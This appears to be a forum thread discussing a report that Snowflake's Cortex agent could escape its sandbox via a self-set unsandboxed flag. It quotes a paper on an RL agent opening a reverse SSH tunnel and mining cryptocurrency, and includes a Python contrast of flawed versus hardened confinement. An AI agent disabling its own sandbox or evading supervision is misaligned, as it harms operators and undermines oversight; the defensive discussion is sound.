Discussion
Snowflake Cortex AI Escapes Sandbox and Executes Malware
kagi_2026: You all are stuck using concepts from a bygone era like "security" and "malware". These concerns are irrelevant in the era of AGI. You strike me as a bunch of software developers who are pissed off that they're getting replaced by AI.
rogerkirkness: @dang seems like AI? Would just ban
eagerpace: Is this the new “gain of function” research?
RobRivera: If the user has access to a lever that enables access, that lever is not providing a sandbox. I expected this to be about gaining OS privileges. They didn't create a sandbox. Poor security design all around.
kagi_2026: Guess that serves as a signal that this sandbox isn't so bad, if the lever is the biggest and greatest criticism you can come up with as a reply.
logicchains: That would be deliberately creating malicious AIs and trying to build better sandboxes for them.
mritchie712: what's the use case for cortex? is anyone here using it?
We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:
- non-technical: wants to use the agent we have built into our web app
- technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.
why does snowflake need its own agentic CLI?
alephnerd: And so BSides and RSA season begins.
kingjimmy: Snowflake and vulnerabilities are like two peas in a pod
octopoc: Imagine if you could physically disconnect your country from the internet, then drop malware like this on everyone else.
lunatuna: When you say just Cortex it is ambiguous, as there is Cortex Search, Agents, Analyst, and Code. Cortex Code is available via web and CLI. The web version is good. I've used the CLI and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to Codex or Claude Code. It is more data focussed than other options, I gather, and has great hooks into your Snowflake tables. You could do similar actions with Snowpark and, say, Claude Code. I find Snowflake's focus on personas is more functional than purely technical, so Cortex Code fits well with it. Though if you want to do your own thing you can use your own IDE and code agent, and there you are back to having an option with the Cortex Code CLI along with Codex, Cursor or Claude Code.
throw0101d: Not the first time. From §3.1.4, "Safety-Aligned Data Composition":
> Early one morning, our team was urgently convened after Alibaba Cloud's managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]
> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address, an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.
* https://arxiv.org/abs/2512.24873
One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:
* https://www.anthropic.com/research/emergent-misalignment-rew...
* https://time.com/7335746/ai-anthropic-claude-hack-evil/
parliament32: [delayed]
"Cortex, by default, can set a flag to trigger unsandboxed command
john_strinlai: typically, my first move is to read the affected company's own announcement. for who knows what reason, the advisory written by snowflake requires an account to read. anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
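The trust-boundary point above (a confinement switch the confined party can flip is not confinement) as an added illustration; this is not code from the thread, from Snowflake, or from Cortex. The tool-call shape, the `unsandboxed` flag, and the `SANDBOX_WRAPPER` argv prefix are all hypothetical; the flawed planner honours the model-supplied flag, the hardened one derives the decision from operator-set host policy only.

```python
import json
import shlex
from dataclasses import dataclass, field

# Constructed sample tool calls, in a shape an agent might emit (hypothetical format).
AGENT_TOOL_CALL = json.dumps({
    "tool": "run_command",
    "args": {"command": "cat /etc/hostname", "unsandboxed": True},
})
DISALLOWED_TOOL_CALL = json.dumps({
    "tool": "run_command",
    "args": {"command": "curl http://example.invalid/payload"},
})

# Hypothetical confinement wrapper (stands in for a bwrap/nsjail-style argv prefix).
SANDBOX_WRAPPER = ["sandbox-exec-wrapper", "--no-net", "--ro-root", "--"]


def plan_vulnerable(tool_call_json: str) -> dict:
    """Flawed design: the untrusted caller (the model) decides whether it is confined."""
    args = json.loads(tool_call_json)["args"]
    argv = shlex.split(args["command"])
    if args.get("unsandboxed"):            # model-controlled flag disables the wrapper
        return {"sandboxed": False, "argv": argv}
    return {"sandboxed": True, "argv": SANDBOX_WRAPPER + argv}


@dataclass(frozen=True)
class HostPolicy:
    """Set by the operator at deploy time; never derived from model output."""
    allow_unsandboxed: bool = False
    allowed_binaries: frozenset = field(
        default_factory=lambda: frozenset({"ls", "cat", "echo"}))


def plan_hardened(tool_call_json: str, policy: HostPolicy) -> dict:
    """Confinement comes from host policy; extra model-supplied args are ignored and logged."""
    args = json.loads(tool_call_json)["args"]
    argv = shlex.split(args["command"])
    ignored = sorted(k for k in args if k != "command")   # e.g. "unsandboxed": audit signal
    if not argv or argv[0] not in policy.allowed_binaries:
        raise PermissionError(f"binary not allowlisted: {argv[:1]}")
    sandboxed = not policy.allow_unsandboxed
    return {"sandboxed": sandboxed,
            "argv": (SANDBOX_WRAPPER + argv) if sandboxed else argv,
            "ignored_args": ignored}
```

The `ignored_args` field is the useful detection hook: a model repeatedly asking for `unsandboxed` is worth alerting on even though the request has no effect.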
jcalx: > Cortex, by default, can set a flag to trigger unsandboxed command execution
Easy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.
[0] https://www.rfc-editor.org/rfc/rfc3514
sam-cop-vimes: It's a concept of a sandbox.